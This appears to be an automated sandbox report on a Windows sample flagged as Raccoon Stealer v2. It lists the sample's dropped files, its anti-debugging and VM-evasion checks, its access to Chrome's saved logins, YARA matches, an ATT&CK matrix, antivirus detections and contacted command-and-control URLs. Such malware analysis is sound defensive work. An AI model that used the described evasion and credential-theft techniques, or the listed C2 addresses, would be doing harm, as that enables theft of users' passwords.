Source: C:\Users\user\Desktop\KbqArOlW06.exe TID: 2236

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_21-6037

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

API call chain: ExitProcess graph end node

graph_21-6987

Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWar&Prod_VMware_SATA_CD00#5&280b647)

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

Code function: 21_2_0040A050 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

21_2_0040A050

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose,	22_2_00476F44
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	22_2_0049AF28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	22_2_004650D0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00453238 FindFirstFileA,GetLastError,	22_2_00453238
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	22_2_0046554C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose,	22_2_00463B44

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_00450A28

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"			Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0047A678 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

22_2_0047A678

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0042E52C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

22_2_0042E52C

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0042F294 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,

22_2_0042F294

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: GetLocaleInfoA,	21_2_00405694
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: GetLocaleInfoA,	21_2_004056E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: GetLocaleInfoA,	22_2_004089F8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: GetLocaleInfoA,	22_2_00408A44

Source: C:\Users\user\Desktop\KbqArOlW06.exe

Queries volume information: C:\Users\user\Desktop\KbqArOlW06.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

Code function: 21_2_004026C4 GetSystemTime,

21_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_00455DCC GetUserNameA,

22_2_00455DCC

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_00458E58 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

22_2_00458E58

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe

Code function: 21_2_00404654 GetModuleHandleA,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

21_2_00404654

Stealing of Sensitive Information

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match

File source: Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332, type: MEMORYSTR

Remote Access Functionality

Yara detected Raccoon Stealer v2

Source: Yara match	File source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	Path Interception	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	12 Process Injection	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Software Packing	NTDS	237 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	241 Virtualization/Sandbox Evasion	Cached Domain Credentials	421 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	11 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	241 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	3 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
KbqArOlW06.exe	27%	Virustotal		Browse
KbqArOlW06.exe	29%	Metadefender		Browse
KbqArOlW06.exe	69%	ReversingLabs	ByteCode-MSIL.Backdoor.Crysan
KbqArOlW06.exe	100%	Avira	HEUR/AGEN.1231971

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\nss3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	Virustotal	Browse
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.KbqArOlW06.exe.18de6818.7.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
22.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.400000.0.unpack	100%	Avira	HEUR/AGEN.1248792	Download File
16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.KbqArOlW06.exe.16726700.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.KbqArOlW06.exe.16636690.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.KbqArOlW06.exe.16866738.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.KbqArOlW06.exe.179e67e0.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.KbqArOlW06.exe.16ae6770.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.KbqArOlW06.exe.166866c8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.KbqArOlW06.exe.16fe67a8.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.palkornel.hu/innosetup	0%	Virustotal		Browse
http://www.palkornel.hu/innosetup	0%	Avira URL Cloud	safe
http://www.remobjects.com/psU	0%	URL Reputation	safe
http://51.195.166.178/	8%	Virustotal		Browse
http://51.195.166.178/	0%	Avira URL Cloud	safe
http://www.palkornel.hu/innosetup%1	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe
https://mozilla.org0	0%	URL Reputation	safe
http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://51.195.166.178/	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	false	URL Reputation: safe	unknown
https://www.mediachance.com/2	A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr	false		high
http://www.palkornel.hu/innosetup	A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
